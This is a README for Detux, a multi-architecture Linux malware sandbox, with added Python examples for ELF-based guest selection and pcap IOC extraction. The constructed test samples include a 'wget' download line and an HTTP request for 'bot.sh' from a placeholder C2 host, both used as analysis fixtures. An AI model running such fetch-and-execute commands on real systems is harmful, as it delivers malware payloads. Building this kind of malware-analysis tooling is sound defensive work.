detux: The Multiplatform Linux Sandbox
Introduction:
Detux is a sandbox built to run Linux malware samples, capture their network traffic and extract indicators of compromise (IOCs) from it. The QEMU hypervisor is used to emulate Debian Linux guests for several CPU architectures.
The following CPUs are currently supported:
- x86
- x86-64
- ARM
- MIPS
- MIPSEL
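Because the sandbox has one guest per architecture, the first thing an analysis has to do is read the ELF header of the sample and pick the matching guest; the same static pass can also pull out printable strings. The following is an added example, written for this page rather than taken from the Detux code base. It parses only the fixed part of the ELF header (EI_CLASS, EI_DATA and e_machine, as readelf -h would show them) and maps it onto the five architectures listed above. The guest names ("x86", "x86-64", "arm", "mips", "mipsel"), the `select_guest`/`extract_strings` helpers and the constructed header bytes are this example's own assumptions; 64-bit MIPS and big-endian ARM deliberately return None because no guest above matches them.

```python
import re
import struct

# ELF constants from the ELF specification (e_ident indices and e_machine values)
ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA = 4, 5
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
EM_386, EM_MIPS, EM_ARM, EM_X86_64 = 3, 8, 40, 62

# Guest labels are this example's own names for the five supported architectures
GUESTS = {
    (ELFCLASS32, ELFDATA2LSB, EM_386): "x86",
    (ELFCLASS64, ELFDATA2LSB, EM_X86_64): "x86-64",
    (ELFCLASS32, ELFDATA2LSB, EM_ARM): "arm",
    (ELFCLASS32, ELFDATA2MSB, EM_MIPS): "mips",
    (ELFCLASS32, ELFDATA2LSB, EM_MIPS): "mipsel",
}


def elf_info(data: bytes):
    """Parse the fixed ELF header prefix: (ei_class, ei_data, e_type, e_machine), or None if not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[EI_CLASS], data[EI_DATA]
    if ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        return None
    # e_type and e_machine are 16-bit fields at offset 16, stored in the file's own byte order
    endian = "<" if ei_data == ELFDATA2LSB else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return ei_class, ei_data, e_type, e_machine


def select_guest(data: bytes):
    """Name of the QEMU guest able to run this sample, or None if no guest matches."""
    info = elf_info(data)
    if info is None:
        return None
    ei_class, ei_data, _, e_machine = info
    return GUESTS.get((ei_class, ei_data, e_machine))


def extract_strings(data: bytes, min_len: int = 4):
    """Basic 'strings': runs of printable ASCII at least min_len bytes long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def make_elf_prefix(ei_class: int, ei_data: int, e_machine: int) -> bytes:
    """Constructed 20-byte ELF prefix (e_ident + e_type=ET_EXEC + e_machine) for demonstration."""
    ident = ELF_MAGIC + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    endian = "<" if ei_data == ELFDATA2LSB else ">"
    return ident + struct.pack(endian + "HH", 2, e_machine)


if __name__ == "__main__":
    # Constructed sample: a big-endian MIPS header followed by a few bytes of fake body
    sample = make_elf_prefix(ELFCLASS32, ELFDATA2MSB, EM_MIPS) + b"\x00/bin/sh\x00wget http://203.0.113.10/x\x00"
    print("guest:", select_guest(sample))
    print("strings:", extract_strings(sample))
```

Only the header is trusted here; a sample that lies about its machine type simply fails to start in the chosen guest, which is itself a useful observation. A real triage pass would add the program headers and section names, but the guest choice depends on nothing beyond these three fields.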
What's in the report?
- Static Analysis
  - Basic strings extracted from the binary
  - ELF information produced by readelf
  - report.py can be modified to run additional third-party commands against the binary and add their output to the report dict (DICT)
- Dynamic Analysis
  - The captured pcaps are parsed with dpkt to extract IOCs and human-readable information from the packets
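The dynamic part of the report comes entirely from the capture, so the interesting work is turning raw packets into IOCs: which hosts and ports the sample contacted, what names it resolved, and what it asked for over HTTP. The block below is an added example written for this page, not code from Detux; it uses only the Python standard library instead of dpkt so it runs anywhere, and it walks a pcap in the same way a dpkt-based report would (pcap record, Ethernet, IPv4, UDP/TCP, then the DNS question or HTTP request line). The capture it analyses is constructed in the block itself: the guest address 10.0.2.15, the resolver 10.0.2.3, the server 203.0.113.10 and the name c2.example.com are placeholders, and `build_frame`/`build_pcap` exist only to fabricate that input.

```python
import struct

LINKTYPE_ETHERNET = 1
PROTO_TCP, PROTO_UDP = 6, 17


def _ip(s: str) -> bytes:
    return bytes(int(o) for o in s.split("."))


def build_frame(src: str, dst: str, proto: int, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/{UDP,TCP} frame (checksums left zero; fine for offline parsing)."""
    if proto == PROTO_UDP:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    else:  # minimal 20-byte TCP header, data offset 5, flags PSH|ACK
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0, _ip(src), _ip(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + l4  # zero MACs, EtherType IPv4


def build_pcap(frames) -> bytes:
    """Constructed libpcap file (little-endian, link type Ethernet) wrapping the given frames."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1500000000 + i, 0, len(f), len(f)) + f
    return out


def build_dns_query(name: str, txid: int = 0x1234) -> bytes:
    """Standard DNS query (RD set) for an A record of `name`."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)


def dns_question_name(payload: bytes):
    """Name in the first question of a DNS message, or None if there is none."""
    if len(payload) < 12 or struct.unpack("!H", payload[4:6])[0] == 0:
        return None
    labels, pos = [], 12
    while pos < len(payload) and payload[pos] != 0:
        n = payload[pos]
        if n & 0xC0:  # compression pointer: not valid in a plain question name
            return None
        labels.append(payload[pos + 1:pos + 1 + n].decode("ascii", "replace"))
        pos += 1 + n
    return ".".join(labels) or None


def extract_iocs(pcap: bytes) -> dict:
    """Walk a pcap and collect contacted endpoints, DNS lookups and HTTP requests."""
    iocs = {"endpoints": set(), "dns_queries": set(), "http_hosts": set(), "http_requests": set()}
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(pcap[:4])
    if endian is None or struct.unpack(endian + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("not an Ethernet pcap")
    pos = 24
    while pos + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[pos:pos + 16])[2]
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue  # only IPv4 over Ethernet is handled here
        ihl, proto = (frame[14] & 0x0F) * 4, frame[23]
        dst = ".".join(str(b) for b in frame[30:34])
        l4 = frame[14 + ihl:]
        if proto == PROTO_UDP and len(l4) >= 8:
            dport, payload = struct.unpack("!H", l4[2:4])[0], l4[8:]
        elif proto == PROTO_TCP and len(l4) >= 20:
            dport, payload = struct.unpack("!H", l4[2:4])[0], l4[(l4[12] >> 4) * 4:]
        else:
            continue
        iocs["endpoints"].add((dst, dport, "udp" if proto == PROTO_UDP else "tcp"))
        if proto == PROTO_UDP and dport == 53:
            name = dns_question_name(payload)
            if name:
                iocs["dns_queries"].add(name)
        if proto == PROTO_TCP and payload[:5] in (b"GET /", b"POST ", b"HEAD /"):
            lines = payload.split(b"\r\n")
            iocs["http_requests"].add(lines[0].decode("ascii", "replace"))
            for h in lines[1:]:
                if h.lower().startswith(b"host:"):
                    iocs["http_hosts"].add(h[5:].strip().decode("ascii", "replace"))
    return iocs


# Constructed sample capture: the guest resolves a name, then fetches a script over plain HTTP
SAMPLE_PCAP = build_pcap([
    build_frame("10.0.2.15", "10.0.2.3", PROTO_UDP, 40000, 53, build_dns_query("c2.example.com")),
    build_frame("10.0.2.15", "203.0.113.10", PROTO_TCP, 40001, 80,
                b"GET /bot.sh HTTP/1.1\r\nHost: c2.example.com\r\nUser-Agent: Wget\r\n\r\n"),
])

if __name__ == "__main__":
    for key, values in extract_iocs(SAMPLE_PCAP).items():
        print(key, sorted(values))
```

The parser is deliberately strict about what it understands (IPv4 only, HTTP only when the TCP payload begins with a request line) and silently skips everything else; in a sandbox that is the right failure mode, since a malformed or unexpected packet from the sample should never abort the report. Endpoints are recorded even when the payload is not decoded, so non-HTTP C2 on an unusual port still shows up as an IOC.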
Architecture
- Host (the host itself can be a VM or a bare-metal machine)
- QEMU
- dumpcap
- DETUX Scripts
Network Arch
- NIC1: this interface is used for accessing the host
- NIC2: interface bridged with the QEMU sandbox VMs. Traffic from this interface can be redirected to Whonix, REMnux or a custom gateway to filter or allow internet access for the sandboxed VMs.
VM Setup
Usage
Copyright (c) 2015 Vikas Iyengar, iyengar.vikas@gmail.com (http://garage4hackers.com)
Copyright (c) 2016 Detux Sandbox, http://detux.org
Source: https://github.com/detuxsandbox/